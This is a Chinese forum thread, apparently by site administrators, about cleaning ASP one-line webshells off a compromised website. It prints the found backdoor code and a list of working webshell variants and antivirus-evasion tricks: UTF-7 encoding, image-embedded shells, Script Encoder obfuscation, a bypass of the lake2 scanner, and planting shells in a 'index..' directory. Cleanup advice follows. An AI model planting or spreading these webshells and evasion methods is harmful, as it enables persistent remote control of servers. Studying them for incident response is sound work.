根据中马时间搜索出下列可疑文件及代码：

bottum.asp

1、<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
2、ms.Language="VBScript"
3、ms.AddObject "Response", Response
4、ms.AddObject "request", request
5、ms.AddObject "session", session
6、ms.AddObject "server", server
7、ms.AddObject "application", application
8、ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
COON.asp

<%ExecuteGlobal request(chr(35))%>
mian.asp

<%ExecuteGlobal request(chr(35))%>

包含同类型语句的文件很多，同时存在不同的目录，伪装的也很巧妙。

index.asp

289582993.asp

要清干净的话，每个目录看下文件的更新时间。

而且极有可能植入系统。

以下是一句话木马代码及时间，

　　<%execute request("#")%>  9月15日

　　<%execute request(chr(35))%>  9月30日

　　<script language=VBScript runat=server>if request(chr(35))<>"""" then

　　ExecuteGlobal request(chr(35))

　　</script>

　　<%ExecuteGlobal request(chr(35))%> 9月30日

　　<%eval request("#")%>

　　以上都是正常的SHELL，下面几个是变形，或者是用来免杀的

　　数据库里插入

　　┼攠数畣整爠焕敌瑳∨∣┩忾

　　utf-7的马

　　<%@ codepage=65000%>

　　<% response.Charset="936"%>

　　<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

　　用include包含一个图片,图片最好是通过copy /b 1.jpg+1.asp+1.jpg 2.jpg生成出来的

　　要绕过lake2的话，用几个变量加常量的方法定义图片名再包含就可以了

　　<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

　　ms.Language="VBScript"

　　ms.AddObject "Response", Response

　　ms.AddObject "request", request

　　ms.AddObject "session", session

　　ms.AddObject "server", server

　　ms.AddObject "application", application

　　ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

　　Script Encoder 加密  9月30日

　　<%@ LANGUAGE = VBScript.Encode %>

　　<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

　　另外还一个另类的，利用windows的目录漏洞,建立..\目录里面放一句话，

　　Set fso=Server.CreateObject("Scripting.FileSystemObject")

　　path=server.mappath("/")

　　Set f = fso.CreateFolder(path&"\index..\")

　　Set a = fso.CreateTextFile(path&"\index..\1.asp", True)

　　a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"

　　a.WriteLine"response.clear"

　　a.WriteLine"Execute request(chr(35))"

　　a.WriteLine"response.end"

　　a.WriteLine"end if"

　　a.WriteLine"</script>"

　　一句话的木马并不只是有这些.脚本语言中大多数和系统交互的函数都能够用来作为后门.安全性和可用性是不可逆的.

所以，用UltraEdit替换模板，图片目录的还是根据时间排查。系统删掉从新设置登陆口令，关闭会员注册，上传功能，删掉admin/ks.template.asp和admin/upfilesave.asp文件，这是暂时的方法了。

啊？难到他会自动再生成啊？？

最上面的为一句话木马 简单实用

数据库里没有，

直接根据时间删除

我是9月29日中的，那这几天的可疑的图片都可以全删掉，系统重新解压，

如何清除？

　以上都是正常的SHELL，下面几个是变形，或者是用来免杀的

　　数据库里插入

　　┼攠数畣整爠焕敌瑳∨∣┩忾

那数据库里一定有木马？？？